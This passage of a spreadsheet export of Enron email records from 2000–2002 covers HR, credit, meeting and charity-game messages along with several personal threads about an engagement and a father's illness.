To:	Sultanik, Dinah; Dobbs, Karla_x000D_
Cc:	Barnard, Marla; Love, Phillip M._x000D_
Subject:	FW: Melissa Videtto - Active employee_x000D_
_x000D_
Dinah or Karla,_x000D_
_x000D_
We have been experiencing some call volume on active employee's who are receiving term packet information from Hewitt, but are still active in the system.  Do you know why that is?_x000D_
_x000D_
Please advise._x000D_
_x000D_
Thanks._x000D_
Irma Alvarez_x000D_
HR Svc Connection_x000D_
Ext. 3-1543_x000D_
_x000D_
P.S. Phillip - I show Melissa active in SAP with no future term action out there.  Thxs, Irma _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Barnard, Marla  _x000D_
Sent:	Wednesday, December 26, 2001 2:08 PM_x000D_
To:	HR Service Connection_x000D_
Cc:	Alvarez, Irma_x000D_
Subject:	Melissa Videtto_x000D_
_x000D_
Melissa Videtto received a termination package over the weekend and should not have.  Can you please confirm she has not been terminated so I can send an email confirmation to her manager and herself?  thanks_x000D_
_x000D_
Marla Barnard_x000D_
Vice President - Human Resources_x000D_
Enron Net Works and Enron Broadband Services_x000D_
713-345-8158_x000D_
Cell:  713-898-3083</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 02:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>The site</t>
  </si>
  <si>
    <t>http://ecthou-webcl1.corp.enron.com/research/Index.html</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 08:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sue@burnettps.com'})</t>
  </si>
  <si>
    <t>Request from Better Business Bureau</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Jeff:_x000D_
_x000D_
I would like to invite you to honor us as the keynote speaker for the Tenth _x000D_
Annual Better Business Bureau Awards for Excellence.  This prestigious awards _x000D_
program is currently sponsored by the Better Business Bureau Education _x000D_
Foundation, the Houston Chronicle, and the University of Houston Bauer _x000D_
College of Business.  Proceeds from the event will provide scholarships for _x000D_
outstanding students involved in the BBB Education Foundation's Junior Sleuth _x000D_
program.  In addition, support generated from the program will assist the _x000D_
advancement of Silver Sleuths, a senior protection program initiated by the _x000D_
Better Business Bureau to help senior citizens recognize and prevent consumer _x000D_
fraud in the Houston market place.  Participants will be presented awards in _x000D_
front of some of Houston's most prominent companies and winners will be _x000D_
profiled in a special section of the Houston Chronicle.  Incidentally, Jack _x000D_
Sweeney, Publisher of the Houston Chronicle, will serve as honorary chair for _x000D_
the event._x000D_
_x000D_
The date and location for this year's event has not been set, however, the _x000D_
program will take place in early October and will be held during lunchtime.  _x000D_
Featured keynote speakers have included Frank Carney of Papa John's, Greg _x000D_
Brenneman, President and Chief Operating Officer of Continental Airlines, _x000D_
Frank Maguire, former executive of The ABC Network, Kentucky Fried Chicken, _x000D_
Federal Express, and American Airlines, M. Douglas Ivester, CEO of the _x000D_
Coca-Cola Company, Stanley Marcus of Neiman-Marcus &amp; Co., and Richard _x000D_
Teerlink, President and CEO of Harley Davidson, Inc.  Enron has definitely _x000D_
proven itself to be an asset to the Houston community as a leader and I feel _x000D_
your involvement in our event will only make it more apparent.  I sincerely _x000D_
thank you for your consideration on this matter and I look forward to hearing _x000D_
from you.  You can reach me at 713-977-4777, ext. 126._x000D_
_x000D_
Sue Burnett_x000D_
President_x000D_
Burnett Staffing Specialists_x000D_
</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 02:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: WE HAVE THE TICKETS!!!!!!!!!</t>
  </si>
  <si>
    <t xml:space="preserve">How about a practice on Wednesday and a scrimmage with the other UT team on _x000D_
Thu??  I think that would produce the best results._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Eric Bass @ ECT                           11/13/2000 10:39 AM_x000D_
	_x000D_
_x000D_
To: Michael Simmons/HOU/ECT@ECT, Luis Mena/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: WE HAVE THE TICKETS!!!!!!!!!_x000D_
_x000D_
Scrimmages are fun and all but we need to practice - several times this _x000D_
week.  I am serious about these tickets, so I want to practice as much as _x000D_
possible between now and Saturday.  Let's set something up for tonight and _x000D_
tomorrow night!  _x000D_
I have asked Chris Gaskill (Ex- UT baseball player) to play, he is going to _x000D_
let me know ASAP.  So, if either of you know him, give him a call._x000D_
_x000D_
Let me know about practice._x000D_
---------------------- Forwarded by Eric Bass/HOU/ECT on 11/13/2000 10:35 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Michael Simmons_x000D_
11/13/2000 10:17 AM_x000D_
To: Stephen Schwarzbach/Corp/Enron@Enron, Eric Bass/HOU/ECT@ECT, Luis _x000D_
Mena/NA/Enron@Enron, Paul J Broderick/HOU/ECT@ECT, Sarah Goodpastor/Enron _x000D_
Communications@Enron Communications, Christopher Chenoweth/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: WE HAVE THE TICKETS!!!!!!!!!_x000D_
_x000D_
Major breakthrough, we have 16 tickets.  Now we need to win 'em.  After the _x000D_
f'''aggies near victory vs. ou, these tickets are now priceless.  Therefore, _x000D_
we must win at all cost THIS Saturday, the 18th.  _x000D_
_x000D_
The team to date is as follows:_x000D_
_x000D_
Stephen _x000D_
Eric_x000D_
Luis_x000D_
Paul_x000D_
Sarah   _x000D_
Myself_x000D_
Christopher Chenoweth - new addition (recruited away from Webb Jennings' team _x000D_
at no small cost)_x000D_
_x000D_
One other unnamed guy (Luis, I need this name)._x000D_
_x000D_
===_x000D_
_x000D_
To do:_x000D_
_x000D_
1.   I need all of you to confirm (by voice or email) that you will be able _x000D_
to play on Saturday.  If I don't hear from you, I will have to replace you.  _x000D_
If you think there is a chance that you won't make, please contact me ASAP._x000D_
_x000D_
2.   We need to deliver $2,000 in donations.  If you haven't started bringing _x000D_
in donations, please do so immediately.  I have the donation envelopes, _x000D_
contact me and I'll have one sent to you._x000D_
_x000D_
3.  We will have a scrimmage this Wed. or Thurs.  so mark your calender.  I _x000D_
encourage you all to take whatever steps necessary to see to your physical _x000D_
preparation for this game.  _x000D_
_x000D_
My extension is 37842.   Home phone is 713-864-6229._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Michael Simmons/HOU/ECT on 11/13/2000 _x000D_
09:56 AM ---------------------------_x000D_
_x000D_
_x000D_
WE HAVE 16 TICKETS FOR THE WINNING TEAM!!!_x000D_
_x000D_
Thanks to Brandon Houston and the Andersen Consulting team for finding the _x000D_
tickets!!!!!  Brandon will bring the tickets to the game on Saturday for _x000D_
distribution to the event winners._x000D_
_x000D_
The tickets will cost $560.  Enron will need to pay for half of the tickets.  _x000D_
Ted, please coordinate with Karen Marshall in community relations to have a _x000D_
check for Brandon._x000D_
_x000D_
Thanks everyone!  We are now in excellent shape for the game on Saturday.  _x000D_
Keep collecting those donations this week.  All Enron donation packets _x000D_
received by Brad Mauritzen by 5pm Friday night will be counted towards the _x000D_
kick or receive ball option at the game._x000D_
_x000D_
Thanks,_x000D_
Shelly_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 09:36:48 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'y..resendez@enron.com', 'judy.townsend@enron.com', 'souad.mahmassani@enron.com', 'l..dinari@enron.com', 'genia.fitzgerald@enron.com', 'r..conner@enron.com', 'jay.reitmeyer@enron.com', 'brad.coleman@enron.com', 'loftus.fitzwater@enron.com', 'dutch.quigley@enron.com', 'sean.riordan@enron.com', 'judy.thorne@enron.com', 'richard.deming@enron.com', 'k..allen@enron.com', 'dan.mccairns@enron.com', 'steven.curlee@enron.com', 'steve.van@enron.com', 'j..ewing@enron.com', 'ron.green@enron.com', 'joanne.harris@enron.com', 'scott.hendrickson@enron.com', 'a..price@enron.com', 'shonnie.daniel@enron.com', 'tom.moran@enron.com', 'bryce.baxter@enron.com', 'angelo.miroballi@enron.com', 'lee.jackson@enron.com', 'monique.sanchez@enron.com', 'jay.knoblauh@enron.com', 'rebecca.phillips@enron.com', 'greg.brazaitis@enron.com', 'denver.plachy@enron.com', 'gerald.nemec@enron.com', 'joe.hunter@enron.com', 'ina.rangel@enron.com', 'sara.shackleton@enron.com', 'vladi.pimenov@enron.com', 'j..farmer@enron.com', 'christina.bangle@enron.com', 'j..sturm@enron.com', 'matthew.lenhart@enron.com', 'jabari.martin@enron.com', 'a..shankman@enron.com', 'kelli.little@enron.com', 'kevin.ruscitti@enron.com', 'k..ratnala@enron.com', 't..lucci@enron.com', 'mary.ogden@enron.com', 'm..tholt@enron.com', 'f..brawner@enron.com', 'lester.rawson@enron.com', 'credit &lt;.williams@enron.com&gt;', 'mary.cook@enron.com', 'tiffany.smith@enron.com', 'lucy.ortiz@enron.com', 'ellen.wallumrod@enron.com', 'kathryn.bussell@enron.com', 'w..pereira@enron.com', 'nelson.ferries@enron.com', 'geoff.storey@enron.com', 'ann.murphy@enron.com', 'tanya.rohauer@enron.com', 'p..south@enron.com', 'teresa.seibel@enron.com', 'russell.diamond@enron.com', 'scott.goodell@enron.com', 'yuan.tian@enron.com', 'michael.etringer@enron.com', 's..theriot@enron.com', 'jennifer.jennings@enron.com', 'andrea.ring@enron.com', 'h..lewis@enron.com', 'b..fleming@enron.com', 'john.griffith@enron.com', 'eric.boyt@enron.com', 'craig.breslau@enron.com', 'lisa.valderrama@enron.com', 'mike.grigsby@enron.com', 'gregory.schockling@enron.com', 's..pollan@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'f..keavey@enron.com', 'r..brackett@enron.com', 'jeff.stephens@enron.com', 'clinton.anderson@enron.com', 'william.stuart@enron.com', 's..bradford@enron.com', 'david.parquet@enron.com', 'j..miller@enron.com', 'stephanie.stehling@enron.com', 'jennifer.fraser@enron.com', 'derek.bailey@enron.com', 'lisa.gillette@enron.com', 'raiford.smith@enron.com', 'eric.bass@enron.com', 'john.arnold@enron.com', 'jake.thomas@enron.com', 'patrick.hanse@enron.com', 'sarah.mulholland@enron.com', 'christian.yoder@enron.com', 'a..allen@enron.com', 'h..otto@enron.com', 'santiago.garcia@enron.com', 'randy.otto@enron.com', 'keith.holst@enron.com', 'paul.tate@enron.com', 'bernard.dahanayake@enron.com', 'daniel.quezada@enron.com', 'bryan.hull@enron.com', 'george.huan@enron.com', 'steve.neal@enron.com', 'eric.moon@enron.com', 'beth.perlman@enron.com', 'c..aucoin@enron.com', 'kevin.bosse@enron.com', 'd..sorenson@enron.com', 'janelle.scheuer@enron.com', 'john.singer@enron.com', 'b..boxx@enron.com', 'alex.hernandez@enron.com', 'r..lilly@enron.com', 'maria.garza@enron.com', 'joni.fisher@enron.com', 'a..martin@enron.com', 'sherry.pendegraft@enron.com', 's..shively@enron.com', 'sheetal.patel@enron.com', 'l..mims@enron.com', 'd..baughman@enron.com', 'diane.anderson@enron.com', 'r..barker@enron.com', 'nathan.hlavaty@enron.com', 'mark.breese@enron.com', 'chris.lambie@enron.com', 'debra.perlingiere@enron.com', 'e..dickson@enron.com', 'ed.mcmichael@enron.com', 'tracy.ngo@enron.com', 'shauywn.smith@enron.com', 'daniel.reck@enron.com', 'n..gilbert@enron.com', 'lisa.mellencamp@enron.com', "martin.o'leary@enron.com", 'mike.maggi@enron.com', 'vladimir.gorny@enron.com', 'jonathan.horne@enron.com', 'gregg.penman@enron.com', 'sheila.glover@enron.com', 't..hodge@enron.com', 'lisa.lees@enron.com', 's..bryan@enron.com', 's..olinger@enron.com', 'stephanie.sever@enron.com', 'm.hall@enron.com', 'darren.espey@enron.com', 'dennis.benevides@enron.com', 'w..eubanks@enron.com', 'fred.lagrasta@enron.com', 'l..kelly@enron.com', 'craig.taylor@enron.com', 'larry.may@enron.com', 'john.grass@enron.com', 'n..gray@enron.com', 'louis.dicarlo@enron.com', 'tom.donohoe@enron.com', 'jungsuk.suh@enron.com', 'carol.st.@enron.com', 'l..gay@enron.com', 'thomas.mcfatridge@enron.com', 't..muzzy@enron.com', 'cyndie.balfour-flanagan@enron.com', 'chris.germany@enron.com', 'cynthia.franklin@enron.com', 'ragan.bond@enron.com', 'tana.jones@enron.com', 'jim.willis@enron.com', 'john.lavorato@enron.com', 'stacey.richardson@enron.com', 'j..hanson@enron.com', 'dayem.khandker@enron.com', 'maureen.smith@enron.com', 'trading &lt;.williams@enron.com&gt;', 'leslie.reeves@enron.com', 'jennifer.blay@enron.com', 'audrey.cook@enron.com', 'bob.bowen@enron.com', 'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>Credit Watch List--Week of 10/22/01</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a revised Credit Watch listing for the week of 10/22/01.   Please note that US Steel Corporation was placed on "Call Credit" this week._x000D_
If there are any personnel in your group that were not included in this distribution, please insure that they receive a copy of this report._x000D_
To add additional people to this distribution, or if this report has been sent to you in error, please contact Veronica Espinoza at x6-6002._x000D_
For other questions, please contact Jason R. Williams at x5-3923,  Veronica Espinoza at x6-6002 or Darren Vanek at x3-1436._x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>---------------------- Forwarded by Phillip K Allen/HOU/ECT on 08/16/2000 _x000D_
10:58 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  David W Delainey                           08/15/2000 01:28 PM_x000D_
	_x000D_
_x000D_
Sent by: Kay Chapman_x000D_
To: Tim Belden/HOU/ECT@ECT, Kevin M Presto/HOU/ECT@ECT, John _x000D_
Arnold/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT, Hunter S Shively/HOU/ECT@ECT, _x000D_
Phillip K Allen/HOU/ECT@ECT, Janet R Dietrich/HOU/ECT@ECT, Christopher F _x000D_
Calger/PDX/ECT@ECT, W David Duran/HOU/ECT@ECT, Raymond Bowen/HOU/ECT@ECT, _x000D_
Jeff Donahue/HOU/ECT@ECT, Brian Redmond/HOU/ECT@ECT, C John _x000D_
Thompson/Corp/Enron@ENRON, Scott Josey/Corp/Enron@ENRON, Rob _x000D_
Milnthorp/CAL/ECT@ECT, Max Yzaguirre/NA/Enron@ENRON, Beth _x000D_
Perlman/HOU/ECT@ECT, Wes Colwell/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, David _x000D_
Oxley/HOU/ECT@ECT, Joseph Deffner/HOU/ECT@ECT, Jordan Mintz/HOU/ECT@ECT, Mark _x000D_
E Haedicke/HOU/ECT@ECT_x000D_
cc: Mollie Gustafson/PDX/ECT@ECT, Felicia Doan/HOU/ECT@ECT, Ina _x000D_
Rangel/HOU/ECT@ECT, Kimberly Brown/HOU/ECT@ECT, Airam Arteaga/HOU/ECT@ECT, _x000D_
Christy Chapman/HOU/ECT@ECT, Tina Rode/HOU/ECT@ECT, Marsha _x000D_
Schiller/HOU/ECT@ECT, Lillian Carroll/HOU/ECT@ECT, Tonai _x000D_
Lehr/Corp/Enron@ENRON, Nicole Mayer/HOU/ECT@ECT, Darlene C _x000D_
Forsyth/HOU/ECT@ECT, Janette Elbertson/HOU/ECT@ECT, Angela _x000D_
McCulloch/CAL/ECT@ECT, Pilar Cerezo/NA/Enron@ENRON, Cherylene R _x000D_
Westbrook/HOU/ECT@ECT, Shirley Tijerina/Corp/Enron@ENRON, Nicki _x000D_
Daw/NA/Enron@Enron, Kimberly Hillis/HOU/ECT@ect _x000D_
Subject: ENA Management Committee_x000D_
_x000D_
_x000D_
This is a reminder !!!!!  There will be a Friday Meeting August 18, 2000.  _x000D_
This meeting replaces the every Friday Meeting and will be held every other _x000D_
Friday._x000D_
_x000D_
     _x000D_
    Date:  Friday August 18, 2000_x000D_
_x000D_
    Time:  2:30 pm - 4:30 pm_x000D_
_x000D_
    Location: 30C1  _x000D_
 _x000D_
    Topic:   ENA Management Committee_x000D_
_x000D_
      _x000D_
_x000D_
_x000D_
If you have any questions or conflicts, please feel free to call me (3-0643) _x000D_
or Bev (3-7857)._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay 3-0643</t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 07:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>New Power GD tickets</t>
  </si>
  <si>
    <t>I have update the New Power tickets 523459 and523444 for the 13th-15.</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 08:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Forecasting Project</t>
  </si>
  <si>
    <t xml:space="preserve">Barbara,_x000D_
_x000D_
We are in touch with Ketra and John and we shall work with them when they are _x000D_
here._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Barbara G Dillard@ENRON_x000D_
08/29/2000 11:23 AM_x000D_
To: Mark Mixon/HOU/EES@EES@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, Stinson Gibner/HOU/ECT@ECT, Laura _x000D_
Luce/Corp/Enron@Enron, D.wear@pecorp.com@EES@ECT, _x000D_
K.schmitt@pecorp.com@EES@ECT, J.wirick@pecorp.com@EES@ECT _x000D_
Subject: Re: Forecasting Project  _x000D_
_x000D_
Mark:_x000D_
_x000D_
F.Y.I. - I have been informed by Ketra that she plans to be in the Houston _x000D_
office on Monday September 18th through Wednesday September 20th to meet with _x000D_
Vince and Stinston.  _x000D_
_x000D_
Hopefully we will be ready to continue Phase I of the Forecasting Project.  _x000D_
Can you make arrangements with Vince and Stinson (hopefully they will be _x000D_
available to meet!)._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Barbara _x000D_
(312)541-1232_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 Jan 2002 09:24:10 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Brett is now officially engaged</t>
  </si>
  <si>
    <t>We are still wating on Bankruptcy court to decide our future.  The Dynegy deal fell through a couple of months ago.  My division (trading ops) will most likely be sold to either UBS or Citigroup._x000D_
_x000D_
Keep in touch._x000D_
_x000D_
Eric_x000D_
_x000D_
-----Original Message-----_x000D_
From: Brett Lawler [mailto:brettlawler@hotmail.com]_x000D_
Sent: Monday, January 07, 2002 1:15 AM_x000D_
To: Bass, Eric_x000D_
Subject: RE: Brett is now officially engaged_x000D_
_x000D_
_x000D_
_x000D_
Eric,_x000D_
_x000D_
Thanks for the Congrats.  Sorry I didn't get to see ya,  it'd been 6 months _x000D_
since I'd gotten to see Marilyn and we had to go through the "rough _x000D_
re-acclimation" period so once we got over it we wanted to spend all our _x000D_
remaining time together.  The holiday bowl did in fact rock, I look forward _x000D_
to next season.  How are you hangnin with this Enron fiasco?  You workin fer _x000D_
Dynergy now?_x000D_
_x000D_
We're rollin to the field tomorrow, I'll drop ya a note when we get out._x000D_
_x000D_
Take Care,_x000D_
_x000D_
Brett._x000D_
&gt;_x000D_
&gt;Congrats on the engagement. Sounds like a great evening.  I hope your _x000D_
&gt;holidays went well otherwise.  Sorry I didn't get to see ya.  Next time _x000D_
&gt;perhaps._x000D_
&gt;_x000D_
&gt;-Eric_x000D_
&gt;_x000D_
&gt;PS I hope you caught the Holiday Bowl - the best game I have seen in _x000D_
&gt;awhile._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;-----Original Message-----_x000D_
&gt;From: Brett Lawler [mailto:brettlawler@hotmail.com]_x000D_
&gt;Sent: Friday, January 04, 2002 3:41 AM_x000D_
&gt;To: a_diekman@hotmail.com; BLawler875@aol.com; CHMARGAU@aol.com;_x000D_
&gt;chris_a_regnier@yahoo.com; c_keels@hotmail.com; czl48@hotmail.com;_x000D_
&gt;e_levitt@hotmail.com; Emily.A.Dickey@questdiagnostics.com; Bass, Eric;_x000D_
&gt;gjzien@yahoo.com; Jennifer.M.Taylor@uth.tmc.edu; John9375@aol.com;_x000D_
&gt;k_m_august@yahoo.com; Lhoff21@aol.com; l.lawler@mail.utexas.edu;_x000D_
&gt;marilynmontano@hotmail.com; mcoombes6400@hotmail.com;_x000D_
&gt;ashbury21@hotmail.com; srhea@acm.org_x000D_
&gt;Subject: Brett is now officially engaged_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Hey there y'all.  Hope you had a Merry X-mas and a good New Year's Eve._x000D_
&gt;I just got back from Texas where I asked Marilyn to marry me (she said yesy_x000D_
&gt;  ou wacko so don't even ask).  I updated the website with pics and a _x000D_
&gt;storyo_x000D_
&gt;  n how it went down._x000D_
&gt;_x000D_
&gt;http://www.blaw1.homestead.com/_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Hope you're all doin well, drop me a note when you get the chance._x000D_
&gt;_x000D_
&gt;Brett._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;__________________________________________________________________x000D_
&gt;Chat with friends online, try MSN Messenger: http://messenger.msn.com_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;**********************************************************************_x000D_
&gt;This e-mail is the property of Enron Corp. and/or its relevant affiliate _x000D_
&gt;and may contain confidential and privileged material for the sole use of _x000D_
&gt;the intended recipient (s). Any review, use, distribution or disclosure by _x000D_
&gt;others is strictly prohibited. If you are not the intended recipient (or _x000D_
&gt;authorized to receive for the recipient), please contact the sender or _x000D_
&gt;reply to Enron Corp. at enron.messaging.administration@enron.com and delete _x000D_
&gt;all copies of the message. This e-mail (and any attachments hereto) are not _x000D_
&gt;intended to be an offer (or an acceptance) and do not create or evidence a _x000D_
&gt;binding and enforceable contract between Enron Corp. (or any of its _x000D_
&gt;affiliates) and the intended recipient or any other party, and may not be _x000D_
&gt;relied on by anyone as the basis of a contract by estoppel or otherwise. _x000D_
&gt;Thank you._x000D_
&gt;**********************************************************************_x000D_
_x000D_
_x000D_
__________________________________________________________________x000D_
Send and receive Hotmail on your mobile device: http://mobile.msn.com</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 08:31:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mimsc@ops.org'})</t>
  </si>
  <si>
    <t>RE: I'm still waiting</t>
  </si>
  <si>
    <t>I called you back at 10:31, i'll try again in about 15/20 minutes.  You should carry your cell phone in your purse in case you need to call me.  Then you van hang up and I'll call you right back!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Mims, Charnella" &lt;mimsc@ops.org&gt;@ENRON [mailto:IMCEANOTES-+22Mims+2C+20Charnella+22+20+3Cmimsc+40ops+2Eorg+3E+40ENRON@ENRON.com] _x000D_
Sent:	Friday, May 25, 2001 10:04 AM_x000D_
To:	Mims, Patrice L._x000D_
Subject:	RE: I'm still waiting_x000D_
_x000D_
Bernie, call me as soon as you can. I am trying to make flight arrangements_x000D_
for San Antonio and I have a question for you._x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Patrice.L.Mims@enron.com [mailto:Patrice.L.Mims@enron.com]_x000D_
Sent: Tuesday, May 22, 2001 1:12 PM_x000D_
To: mimsc@ops.org_x000D_
Subject: RE: I'm still waiting_x000D_
_x000D_
_x000D_
Hi,_x000D_
_x000D_
I need to look at the calendar again, but I think we will be leaving on_x000D_
Saturday the 9th of June.  We'll probably stop in Coffeyville for a day or_x000D_
so and come on through to Omaha._x000D_
_x000D_
I'm sad to hear that Daddy's tube does not seem to be doing the job.  I had_x000D_
to hear that, because I too feel confident that if we can get some_x000D_
nourishment into his body that he will get alot better.  I'm so glad you_x000D_
stepped in and are taking matters into your own hands.  I also feel like_x000D_
Daddy feels real good that you are stepping in as well.  I spoke with Mom_x000D_
yesterday, daddy was sleep, so she really got a chance to tell me how_x000D_
everything really is.  She too is now saying that Daddy is in pretty bad_x000D_
shape._x000D_
_x000D_
I asked Daddy about the retirement, and he said the same thing,  he is not_x000D_
ready yet. but the reality of it is, is that we still need to move now and_x000D_
not wait.  I just hope he understands.  I'm glad Daddy is not in alot of_x000D_
pain.  I think with him seeing the boys will really cheer him up.  It's so_x000D_
hard to face all of this uncertainty isn't it.  The good part, if there is_x000D_
any, is that Daddy is going to a better place with no more suffering.  He's_x000D_
certainly had a good life and we all want him to go on forever, but if_x000D_
there is pain involved, I 'd rather see him out of pain.  Just keep praying_x000D_
for Daddy as well as Mom._x000D_
_x000D_
If there is anything I can do from hear, just let me know._x000D_
_x000D_
Talk with you later!_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   "Mims, Charnella" &lt;mimsc@ops.org&gt;@ENRON_x000D_
_x000D_
[mailto:IMCEANOTES-+22Mims+2C+20Charnella+22+20+3Cmimsc+40ops+2Eorg+3E+40ENR_x000D_
ON@ENRON.com]_x000D_
_x000D_
_x000D_
   Sent:   Tuesday, May 22, 2001 11:27 AM_x000D_
   To:     Mims, Patrice L._x000D_
   Subject:  RE: I'm still waiting_x000D_
_x000D_
   Hey girl, what's going on?  When are you going to be here so I can clear_x000D_
   my_x000D_
   schedule.  I have graduation tonight so I will probably be home late._x000D_
   The_x000D_
   visiting nurse came out last night to check on daddy and to explain how_x000D_
   to_x000D_
   use the feeding tube. I went over there around 9:00p.m. from church._x000D_
   After she fed daddy thru the tube, he upchuck again.  So this tells all_x000D_
   of_x000D_
   us that the feeding tube is not going to do the job.   The main concern_x000D_
   that_x000D_
   is being expressed by everyone is we have to find some way to stop the_x000D_
   vomiting.  The Hospice nurse will be out today at 4:00 and I go back_x000D_
   over_x000D_
   there to hear what they have to say.  Daddy goes to the new doctors on_x000D_
   May_x000D_
   31.  The main concern is the vomiting.  We just have to hang in there_x000D_
   and_x000D_
   keep praying.  After my doctor's visit with Daddy on Thursday, I had a_x000D_
   hard_x000D_
   time dealing with it on Friday.  Everytime someone would ask me about_x000D_
   it, I_x000D_
   would start crying.  I am doing better today and daddy's spirit seemed_x000D_
   fine_x000D_
   last night.  I told Junior about the nurses on Saturday and I left it up_x000D_
   to_x000D_
   him to talk with Corey.  The next thing I need to do is call Daddy's_x000D_
   boss_x000D_
   and ask him about his retirement.  Even though he is eligible, he is not_x000D_
   ready to take that final step.  when junior and I were talking, we_x000D_
   wondered_x000D_
   about what would happen to the retirement (as far as Mom is concerned)_x000D_
   if he_x000D_
   does not officially retire?   Daddy is still very optimistic as we all_x000D_
   are._x000D_
   It is very important that his attitude stays positive.  Enough for now._x000D_
   Talk with you later._x000D_
_x000D_
   -----Original Message-----_x000D_
   From: Patrice.L.Mims@enron.com [mailto:Patrice.L.Mims@enron.com]_x000D_
   Sent: Wednesday, April 25, 2001 10:32 AM_x000D_
   To: mimsc@ops.org_x000D_
   Subject: RE: I'm still waiting_x000D_
_x000D_
_x000D_
   Hey girl,_x000D_
_x000D_
   Sorry, I received all of your messages, but did not respond, sorry.  So_x000D_
   little C.J. looks like a "half-breed", (that's what you''re trying to_x000D_
   say!).  Is he cute?  I can't wait to see him.  Yes, I did talk to Teena_x000D_
   yesterday afternoon, she sounded happy._x000D_
_x000D_
   I spoke with Daddy yesterday and told him to sit his butt down and stop_x000D_
   trying to go to work, especially if there are no health benefits that he_x000D_
   will be losing.  Instead of concentrating on that job, I told him to_x000D_
   concentrate on his health.  He said I was right, and said he was going_x000D_
   to_x000D_
   seriously consider it.  I had to laugh when he said he went to work and_x000D_
   fell asleep reading or trying to throw away some paperwork.  That was_x000D_
   hilarious.  Can you imagine the secretary going in and finding "little_x000D_
   bitty" daddy sitting there asleep.  I cracked up._x000D_
_x000D_
   The concert was good, you know those young men "showed out".  However,_x000D_
   the_x000D_
   concert was supposed to start at 8 and did not start til 9 and had_x000D_
   several_x000D_
   acts before them and as a result, did not get out of the concert until_x000D_
   1:15_x000D_
   p.m.   I was a tired sister, but it was well worth it.  The Hilton_x000D_
   Southwest is close to me, its right be Sharpstown Mall.  Tell me that_x000D_
   dates_x000D_
   again._x000D_
_x000D_
   Talk with you later._x000D_
_x000D_
_x000D_
_x000D_
       -----Original Message-----_x000D_
      From:   "Mims, Charnella" &lt;mimsc@ops.org&gt;@ENRON_x000D_
_x000D_
_x000D_
[mailto:IMCEANOTES-+22Mims+2C+20Charnella+22+20+3Cmimsc+40ops+2Eorg+3E+40ENR_x000D_
   ON@ENRON.com]_x000D_
_x000D_
_x000D_
      Sent:   Wednesday, April 25, 2001 8:51 AM_x000D_
      To:     Mims, Patrice L._x000D_
      Subject:  RE:I'm still waiting_x000D_
_x000D_
      How come I have not had a response from you?  You better get on your_x000D_
      job.  I_x000D_
      was beginning to wonder if you were on vacation or something._x000D_
_x000D_
      I saw "little" Corey last night for the first time.  You can see some_x000D_
   of_x000D_
      his_x000D_
      Indian heritage.  His hair is hair is very straight and he is darker_x000D_
      than_x000D_
      teena.  It was so weird calling him Corey.  That is going to take_x000D_
   some_x000D_
      getting use to for me.  Teena told me that you called her yesterday._x000D_
      I finally got the name of the hotel that the choir will be staying in_x000D_
      when_x000D_
      we arrive in houston on 6/27 &amp; 6/28.  It is not embassy suite.  It is_x000D_
      the_x000D_
      Hilton Houston Southwest.  Where is that in relations to you?_x000D_
_x000D_
      -----Original Message-----_x000D_
      From: Patrice.L.Mims@enron.com [mailto:Patrice.L.Mims@enron.com]_x000D_
      Sent: Tuesday, April 10, 2001 4:29 PM_x000D_
      To: mimsc@ops.org_x000D_
      Subject: RE: Easter_x000D_
_x000D_
_x000D_
_x000D_
      Yes, you are absolutely correct, I can never get ahold of you.    I_x000D_
   know_x000D_
      you're very busy.  Our plane get in at 12:00 on Friday, so we'll_x000D_
   hail a_x000D_
      cab over to Mom's house.  Everything here is going okay.  I hope Tina_x000D_
      has_x000D_
      had the baby by the time I get there this weekend.  I sure don't want_x000D_
      her_x000D_
      to have to spend Easter in the hospital.  As far as dinner is_x000D_
   concerned,_x000D_
      we'll have the regular, roast, ham, macaroni and cheese, greens yams,_x000D_
      etc._x000D_
      Mom said something about getting a turkey, if so, we'll have to have_x000D_
      dressing.  Anyway, I think I am going to choir rehearsal tonight, so_x000D_
      I'll_x000D_
      try to call you on the way home._x000D_
_x000D_
      See ya!</t>
  </si>
  <si>
